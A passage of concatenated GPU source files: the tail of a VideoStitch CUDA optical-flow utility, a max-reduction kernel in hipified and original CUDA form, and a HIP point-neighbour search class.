INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); const float2 originalOutputcoord = outputCoord - make_float2(originalOffset.x, originalOffset.y); // Check the original flow value, in exist at all float2 originalFlow = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); if (inRange(originalOutputcoord, originalSize)) { originalFlow = g_originalCoord[int(originalOutputcoord.y) * originalSize.x + int(originalOutputcoord.x)]; } if (inRange(relativeOutputCoord, outputSize)) { if (originalFlow.x == INVALID_FLOW_VALUE) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } else { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = originalFlow; } } } } } Status OpticalFlow::forwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 originalOffset, const int2 originalSize, const GPU::Buffer<const float2> originalCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); forwardCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(inputOffset, inputSize, inputCoordBuffer.get(), originalOffset, originalSize, originalCoordBuffer.get(), 
outputOffset, outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } __global__ void putOverOriginalFlowKernel(const int2 inputOffset, const int2 inputSize, const float2* const inputFlow, const int2 outputOffset, const int2 outputSize, float2* outputFlow) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= inputSize.x || y >= inputSize.y) return; float2 input = inputFlow[y * inputSize.x + x]; if (input.x != INVALID_FLOW_VALUE) { int2 outputCoord = make_int2(x, y) + inputOffset - outputOffset; if (inRange(outputCoord, outputSize)) { outputFlow[outputCoord.y * outputSize.x + outputCoord.x] = input; } } } Status OpticalFlow::putOverOriginalFlow(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputFlow, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputFlow, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); putOverOriginalFlowKernel<<<dimGrid, dimBlock, 0, stream>>>(inputOffset, inputSize, inputFlow.get(), outputOffset, outputSize, outputFlow.get()); return CUDA_STATUS; } __global__ void identityFlowKernel(const bool normalizedFlow, const int2 size, float2* coordBuffer) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size.x || y >= size.y) return; if (normalizedFlow) { coordBuffer[y * size.x + x] = make_float2(float(x) / size.x, float(y) / size.y); } else { coordBuffer[y * size.x + x] = make_float2(x, y); } } Status OpticalFlow::generateIdentityFlow(const int2 size, GPU::Buffer<float2> coordBuffer, GPU::Stream gpuStream, const bool normalizedFlow) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size.y, TILE_WIDTH), 1); identityFlowKernel<<<dimGrid, dimBlock, 0, stream>>>(normalizedFlow, size, coordBuffer.get()); return CUDA_STATUS; } __global__ void transformOffsetToFlowKernel(const int2 size0, const int2 offset0, const int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 offset = inputBuffer[y * size0.x + x]; if (offset.x != INVALID_FLOW_VALUE) { outputBuffer[y * size0.x + x] = offset + make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); } else { outputBuffer[y * size0.x + x] = offset; } } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, GPU::Buffer<float2> buffer, GPU::Stream gpuStream) { return transformOffsetToFlow(size0, offset0, offset1, buffer, buffer, gpuStream); } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); transformOffsetToFlowKernel<<<dimGrid, dimBlock, 0, stream>>>(size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void transformFlowToOffsetKernel(const int2 size0, const int2 offset0, const 
int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 flow = inputBuffer[y * size0.x + x]; if (flow.x != INVALID_FLOW_VALUE) outputBuffer[y * size0.x + x] = flow - make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); else outputBuffer[y * size0.x + x] = flow; } Status OpticalFlow::transformFlowToOffset(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); transformFlowToOffsetKernel<<<dimGrid, dimBlock, 0, stream>>>(size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void coordLookupKernel(int outputWidth, int outputHeight, const float2* g_iCoord, int inputWidth, int inputHeight, const uint32_t* g_idata, uint32_t* g_odata) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < outputWidth && y < outputHeight) { float2 uv = g_iCoord[y * outputWidth + x]; int2 size = make_int2(inputWidth, inputHeight); g_odata[y * outputWidth + x] = Image::bilinearLookup<Image::BilinearLookupRGBAtoRGBA>(uv, size, g_idata); } } Status OpticalFlow::coordLookup(const int outputWidth, const int outputHeight, const GPU::Buffer<const float2> coordBuffer, const int inputWidth, const int inputHeight, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(outputWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(outputHeight, dimBlock.y), 1); coordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(outputWidth, outputHeight, coordBuffer.get(), inputWidth, inputHeight, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] *= toMul; } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); mulFlowOperatorKernel<<<dimGrid, dimBlock, 0, stream.get()>>>(dst.get(), toMul, size); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2* src, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] = make_float2(src[i].x * toMul.x, src[i].y * toMul.y); } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const GPU::Buffer<const float2> src, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); mulFlowOperatorKernel<<<dimGrid, dimBlock, 0, stream.get()>>>(dst.get(), src.get(), toMul, size); return CUDA_STATUS; } __global__ void generateWeightKernel(const int kernelSize, const float 
sigmaDistance, float* kernelWeight) { int y = blockIdx.y * blockDim.x + threadIdx.y; int x = blockIdx.x * blockDim.y + threadIdx.x; if (x <= 2 * kernelSize && y <= 2 * kernelSize) { float maxDist = kernelSize * 1.4142; float distSpace = length(make_float2(x - kernelSize, y - kernelSize)) / maxDist; float weightDist = exp(-sigmaDistance * distSpace * distSpace); kernelWeight[y * (2 * kernelSize + 1) + x] = weightDist; } } __global__ void interCoordLookupKernel(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const uint32_t* inputBuffer, const int coordWidth, const int coordHeight, const float2* coordBuffer, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < coordWidth && y < coordHeight) { float2 coord = coordBuffer[y * coordWidth + x] - make_float2(interOffsetX, interOffsetY); if (coord.x >= 0 && coord.x < interWidth && coord.y >= 0 && coord.y < interHeight) { outputBuffer[y * coordWidth + x] = inputBuffer[int(coord.y) * interWidth + int(coord.x)]; } else { outputBuffer[y * coordWidth + x] = 0; } } } Status OpticalFlow::interCoordLookup(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const GPU::Buffer<const uint32_t> inputBuffer, const int coordWidth, const int coordHeight, const GPU::Buffer<const float2> coordBuffer, GPU::Buffer<uint32_t> output, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(coordWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(coordHeight, dimBlock.y), 1); interCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(warpWidth, interOffsetX, interOffsetY, interWidth, interHeight, inputBuffer.get(), coordWidth, coordHeight, coordBuffer.get(), output.get()); return CUDA_STATUS; } __global__ void flowToRGBAKernel(const int2 size, const float2* inputBuffer, const int2 maxFlowValue, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { float2 input = inputBuffer[y * size.x + x]; if (abs(input.x - INVALID_FLOW_VALUE) < 1e-5) { outputBuffer[y * size.x + x] = 0; } else { outputBuffer[y * size.x + x] = Image::RGBA::pack((float(input.x) / maxFlowValue.x) * 255, (float(input.y) / maxFlowValue.y) * 255, 0, 255); } } } Status OpticalFlow::convertFlowToRGBA(const int2 size, const GPU::Buffer<const float2> src, const int2 maxFlowValue, GPU::Buffer<uint32_t> dst, GPU::Stream stream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); flowToRGBAKernel<<<dimGrid, dimBlock, 0, stream.get()>>>(size, src.get(), maxFlowValue, dst.get()); return CUDA_STATUS; } __global__ void setAlphaToFlowBufferKernel(const int2 size, const uint32_t* colorBuffer, float2* flowBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { const unsigned index = y * size.x + x; if (Image::RGBA::a(colorBuffer[index]) == 0) { flowBuffer[index] = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } } } Status OpticalFlow::setAlphaToFlowBuffer(const int2 size, const GPU::Buffer<const 
uint32_t> colorBuffer, GPU::Buffer<float2> flowBuffer, GPU::Stream gpuStream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); cudaStream_t stream = gpuStream.get(); setAlphaToFlowBufferKernel<<<dimGrid, dimBlock, 0, stream>>>(size, colorBuffer.get(), flowBuffer.get()); return CUDA_STATUS; } } // namespace Util } // namespace VideoStitch
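Every launcher in the file above follows the same recipe: a TILE_WIDTH x TILE_WIDTH thread block, a grid obtained by ceil-dividing the buffer size, and an early-out bounds check inside the kernel. The following is a minimal, self-contained sketch of that pattern outside the VideoStitch wrappers; the kernel name fillIdentityFlow and the local ceilDiv helper are hypothetical stand-ins, not part of the library.

// Illustrative sketch only (not part of the original file).
#include <cuda_runtime.h>

static unsigned ceilDiv(unsigned a, unsigned b) { return (a + b - 1) / b; }

__global__ void fillIdentityFlow(float2* coord, int2 size) {
  const int x = blockIdx.x * blockDim.x + threadIdx.x;
  const int y = blockIdx.y * blockDim.y + threadIdx.y;
  if (x >= size.x || y >= size.y) return;  // guard against partial tiles at the borders
  coord[y * size.x + x] = make_float2((float)x, (float)y);
}

int main() {
  const int2 size = make_int2(640, 480);
  float2* d_coord = 0;
  cudaMalloc((void**)&d_coord, size.x * size.y * sizeof(float2));
  dim3 block(16, 16, 1);                                          // same shape as TILE_WIDTH x TILE_WIDTH
  dim3 grid(ceilDiv(size.x, block.x), ceilDiv(size.y, block.y), 1);
  fillIdentityFlow<<<grid, block>>>(d_coord, size);
  cudaDeviceSynchronize();
  cudaFree(d_coord);
  return 0;
}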
acd4ff7a6fe95c16d82531be51133658070ea313.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <iostream> #include <cutil_inline.h> // includes cuda.h and hip/hip_runtime_api.h #include <cutil_math.h> #include "reductionMax.hh" #include "sharedMem.cuh" // Instantiate kernels to prevent linker errors template int reduce_max<int >(int *d_odata, int *d_idata, int size); template float reduce_max<float >(float *d_odata, float *d_idata, int size); template double reduce_max<double>(double *d_odata, double *d_idata, int size); template <class T, unsigned int blockSize> __global__ void reduce_max_kernel(T *g_odata, T *g_idata, unsigned int n) { SharedMemory<T> smem; T *sdata = smem.getPointer(); // perform first level of reduction, // reading from global memory, writing to shared memory unsigned int tid = threadIdx.x; unsigned int i = blockIdx.x*blockSize + threadIdx.x; unsigned int gridSize = blockSize*2*gridDim.x; // we reduce multiple elements per thread. The number is determined by the // number of active thread blocks (via gridSize). More blocks will result // in a larger gridSize and therefore fewer elements per thread T thMax = fmaxf(g_idata[i], g_idata[i + blockSize]); i += gridSize; while (i < n) { T a = fmaxf(g_idata[i], g_idata[i + blockSize]); thMax = fmaxf(thMax, a); i += gridSize; } sdata[tid] = thMax; __syncthreads(); // do reduction in shared mem if (blockSize >= 512) { if (tid < 256) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 256]); } __syncthreads(); } if (blockSize >= 256) { if (tid < 128) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 128]); } __syncthreads(); } if (blockSize >= 128) { if (tid < 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 64]); } __syncthreads(); } if (tid < 32) { if (blockSize >= 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 32]); } if (blockSize >= 32) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 16]); } if (blockSize >= 16) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 8]); } if (blockSize >= 8) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 4]); } if (blockSize >= 4) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 2]); } if (blockSize >= 2) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 1]); } } // write result for this block to global mem if (tid == 0) g_odata[blockIdx.x] = sdata[0]; } template <class T> T reduce_max(T *d_odata, T *d_idata, int size) { const int maxThreads = 128; const int maxBlocks = 128; // TODO: Test/Increase for future devices w/ more processors int threads = 1; if( size != 1 ) { threads = (size < maxThreads*2) ? 
size / 2 : maxThreads; } int blocks = size / (threads * 2); blocks = min(maxBlocks, blocks); dim3 dimBlock(threads, 1, 1); dim3 dimGrid(blocks, 1, 1); int smemSize = threads * sizeof(T); switch (threads) { case 512: hipLaunchKernelGGL(( reduce_max_kernel<T, 512>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 256: hipLaunchKernelGGL(( reduce_max_kernel<T, 256>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 128: hipLaunchKernelGGL(( reduce_max_kernel<T, 128>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 64: hipLaunchKernelGGL(( reduce_max_kernel<T, 64>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 32: hipLaunchKernelGGL(( reduce_max_kernel<T, 32>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 16: hipLaunchKernelGGL(( reduce_max_kernel<T, 16>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 8: hipLaunchKernelGGL(( reduce_max_kernel<T, 8>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 4: hipLaunchKernelGGL(( reduce_max_kernel<T, 4>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 2: hipLaunchKernelGGL(( reduce_max_kernel<T, 2>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; case 1: hipLaunchKernelGGL(( reduce_max_kernel<T, 1>), dim3(dimGrid), dim3(dimBlock), smemSize , 0, d_odata, d_idata, size); break; default: exit(1); } T* h_odata = new T[blocks]; cutilSafeCall( hipMemcpy( h_odata, d_odata, blocks*sizeof(T), hipMemcpyDeviceToHost) ); T result = h_odata[0]; for( int i = 1; i < blocks; i++ ) { result = max(result, h_odata[i]); } delete[] h_odata; return result; }
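The hipified file above replaces the CUDA triple-chevron launch syntax with the hipLaunchKernelGGL macro, which takes the grid, block, shared-memory and stream arguments explicitly before the kernel parameters. A minimal sketch of that equivalence, using a hypothetical scaleKernel that is not part of this file:

// Illustrative sketch only (not part of the original file).
#include <hip/hip_runtime.h>

__global__ void scaleKernel(float* data, float factor, int n) {
  int i = blockIdx.x * blockDim.x + threadIdx.x;
  if (i < n) data[i] *= factor;
}

int main() {
  const int n = 1 << 20;
  float* d_data = 0;
  hipMalloc((void**)&d_data, n * sizeof(float));
  dim3 dimBlock(128, 1, 1);
  dim3 dimGrid((n + 127) / 128, 1, 1);
  // Equivalent CUDA-style launch: scaleKernel<<<dimGrid, dimBlock, 0, 0>>>(d_data, 2.0f, n);
  hipLaunchKernelGGL(scaleKernel, dimGrid, dimBlock, 0 /*sharedMem*/, 0 /*stream*/, d_data, 2.0f, n);
  hipDeviceSynchronize();
  hipFree(d_data);
  return 0;
}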
acd4ff7a6fe95c16d82531be51133658070ea313.cu
#include <iostream> #include <cutil_inline.h> // includes cuda.h and cuda_runtime_api.h #include <cutil_math.h> #include "reductionMax.hh" #include "sharedMem.cuh" // Instantiate kernels to prevent linker errors template int reduce_max<int >(int *d_odata, int *d_idata, int size); template float reduce_max<float >(float *d_odata, float *d_idata, int size); template double reduce_max<double>(double *d_odata, double *d_idata, int size); template <class T, unsigned int blockSize> __global__ void reduce_max_kernel(T *g_odata, T *g_idata, unsigned int n) { SharedMemory<T> smem; T *sdata = smem.getPointer(); // perform first level of reduction, // reading from global memory, writing to shared memory unsigned int tid = threadIdx.x; unsigned int i = blockIdx.x*blockSize + threadIdx.x; unsigned int gridSize = blockSize*2*gridDim.x; // we reduce multiple elements per thread. The number is determined by the // number of active thread blocks (via gridSize). More blocks will result // in a larger gridSize and therefore fewer elements per thread T thMax = fmaxf(g_idata[i], g_idata[i + blockSize]); i += gridSize; while (i < n) { T a = fmaxf(g_idata[i], g_idata[i + blockSize]); thMax = fmaxf(thMax, a); i += gridSize; } sdata[tid] = thMax; __syncthreads(); // do reduction in shared mem if (blockSize >= 512) { if (tid < 256) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 256]); } __syncthreads(); } if (blockSize >= 256) { if (tid < 128) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 128]); } __syncthreads(); } if (blockSize >= 128) { if (tid < 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 64]); } __syncthreads(); } if (tid < 32) { if (blockSize >= 64) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 32]); } if (blockSize >= 32) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 16]); } if (blockSize >= 16) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 8]); } if (blockSize >= 8) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 4]); } if (blockSize >= 4) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 2]); } if (blockSize >= 2) { sdata[tid] = fmaxf(sdata[tid], sdata[tid + 1]); } } // write result for this block to global mem if (tid == 0) g_odata[blockIdx.x] = sdata[0]; } template <class T> T reduce_max(T *d_odata, T *d_idata, int size) { const int maxThreads = 128; const int maxBlocks = 128; // TODO: Test/Increase for future devices w/ more processors int threads = 1; if( size != 1 ) { threads = (size < maxThreads*2) ? 
size / 2 : maxThreads; } int blocks = size / (threads * 2); blocks = min(maxBlocks, blocks); dim3 dimBlock(threads, 1, 1); dim3 dimGrid(blocks, 1, 1); int smemSize = threads * sizeof(T); switch (threads) { case 512: reduce_max_kernel<T, 512><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 256: reduce_max_kernel<T, 256><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 128: reduce_max_kernel<T, 128><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 64: reduce_max_kernel<T, 64><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 32: reduce_max_kernel<T, 32><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 16: reduce_max_kernel<T, 16><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 8: reduce_max_kernel<T, 8><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 4: reduce_max_kernel<T, 4><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 2: reduce_max_kernel<T, 2><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; case 1: reduce_max_kernel<T, 1><<< dimGrid, dimBlock, smemSize >>>(d_odata, d_idata, size); break; default: exit(1); } T* h_odata = new T[blocks]; cutilSafeCall( cudaMemcpy( h_odata, d_odata, blocks*sizeof(T), cudaMemcpyDeviceToHost) ); T result = h_odata[0]; for( int i = 1; i < blocks; i++ ) { result = max(result, h_odata[i]); } delete[] h_odata; return result; }
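A possible host-side usage sketch for reduce_max as instantiated above. It assumes this translation unit is linked in and that reductionMax.hh declares the template as shown; the input size is kept a power of two well above 2*maxThreads so the pairwise first-level loads stay in bounds, and d_odata holds one partial result per block (at most 128 with the caps used above).

// Illustrative sketch only (not part of the original file).
#include <cuda_runtime.h>
#include <vector>
#include <iostream>

template <class T> T reduce_max(T* d_odata, T* d_idata, int size);  // declared in reductionMax.hh

int main() {
  const int size = 1 << 20;
  const int maxBlocks = 128;  // matches the cap inside reduce_max
  std::vector<float> h_data(size);
  for (int i = 0; i < size; ++i) h_data[i] = (float)(i % 1000);
  float *d_idata = 0, *d_odata = 0;
  cudaMalloc((void**)&d_idata, size * sizeof(float));
  cudaMalloc((void**)&d_odata, maxBlocks * sizeof(float));  // per-block partial maxima
  cudaMemcpy(d_idata, h_data.data(), size * sizeof(float), cudaMemcpyHostToDevice);
  float result = reduce_max<float>(d_odata, d_idata, size);
  std::cout << "max = " << result << std::endl;  // 999 for this fill pattern
  cudaFree(d_idata);
  cudaFree(d_odata);
  return 0;
}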
3cab49b19ca7c85656bc45669928d77a12380b5c.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /** * @file cudaNeighbours.cpp * @author Luca Bartoli([email protected]) * @brief Cuda class impelentation for get neighbours points for each point * @version 1.0 * @date 2019-08-28 * * @copyright Copyright (c) 2019 * */ #include <src/cudaNeighbours/cudaNeighbours.h> __global__ void kernel(float *d_points, int* d_neighbours, int n, int neighbours, float eps, int MAXNEIGHB){ int id = threadIdx.x + blockIdx.x * blockDim.x; while(id < n){ int i = 0; int s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+n-1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if( i > MAXNEIGHB/2-1){ break; } } s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if(i > MAXNEIGHB-2){ break; } } d_neighbours[MAXNEIGHB * id + i] = -1; id += blockDim.x * gridDim.x; } } bool cudaNeighbours::init(int neighbours, float eps, int MAXNEIGHB,int cudaDevice){ //Get device propriety /////////////////////////////////////////////////////////// int deviceCount; hipGetDeviceCount(&deviceCount); if(deviceCount <= cudaDevice){ std::cerr<<"cudaFiltering: Wrong GPU device ID\n"; exit(-1); } hipSetDevice(cudaDevice); hipDeviceProp_t deviceProp; hipGetDeviceProperties(&deviceProp,cudaDevice); this->sm = deviceProp.multiProcessorCount; std::cout<<"Using: "<<deviceProp.name<<"\n\n"; ////////////////////////////////////////////////////////// this->eps = eps; this->neighbours = neighbours; this->MAXNEIGHB = MAXNEIGHB; #ifndef COMPILE_FOR_NVIDIA_TX2 //malloc on host (pinned memory) HANDLE_ERROR( hipHostMalloc((void**)&h_neighbours, MAXNEIGHB * MAXPOINTS * sizeof(int)) ); #else #pragma message "Select compilation for TX2" h_neighbours = new int[MAXNEIGHB * MAXPOINTS]; #endif HANDLE_ERROR( hipMalloc((void**)&d_points,MAXPOINTS * sizeof(float) * 4) ); HANDLE_ERROR( hipMalloc((void**)&d_neighbours,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); return true; } void cudaNeighbours::calculateNeighbours(float *mat, int n){ HANDLE_ERROR( hipMemset(d_neighbours,0,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); HANDLE_ERROR( hipMemcpy(d_points, mat, n * sizeof(float) * 4, hipMemcpyHostToDevice) ); hipLaunchKernelGGL(( kernel), dim3(this->sm),dim3(1024), 0, 0, d_points, d_neighbours, n, this->neighbours, this->eps, MAXNEIGHB); HANDLE_ERROR( hipDeviceSynchronize() ); HANDLE_ERROR( hipMemcpy(h_neighbours, d_neighbours , MAXNEIGHB * n * sizeof(int), hipMemcpyDeviceToHost) ); } void cudaNeighbours::close(){ hipFree(d_points); #ifndef COMPILE_FOR_NVIDIA_TX2 hipFree(d_neighbours); #else delete [] h_neighbours; #endif hipFree(h_neighbours); }
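init() above obtains h_neighbours as page-locked (pinned) host memory via hipHostMalloc; such allocations are conventionally paired with hipHostFree rather than hipFree. A minimal standalone sketch of that allocate/copy/release pairing; the buffer names here are hypothetical:

// Illustrative sketch only (not part of the original file).
#include <hip/hip_runtime.h>
#include <cstdio>

int main() {
  const int n = 1 << 16;
  int* h_pinned = 0;
  hipHostMalloc((void**)&h_pinned, n * sizeof(int));  // page-locked host allocation, as in init()
  int* d_buf = 0;
  hipMalloc((void**)&d_buf, n * sizeof(int));
  hipMemset(d_buf, 0, n * sizeof(int));
  // Copies to/from pinned memory avoid an extra staging copy and allow async transfers.
  hipMemcpy(h_pinned, d_buf, n * sizeof(int), hipMemcpyDeviceToHost);
  printf("first element: %d\n", h_pinned[0]);
  hipFree(d_buf);
  hipHostFree(h_pinned);  // pinned host memory is released with hipHostFree, not hipFree
  return 0;
}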
3cab49b19ca7c85656bc45669928d77a12380b5c.cu
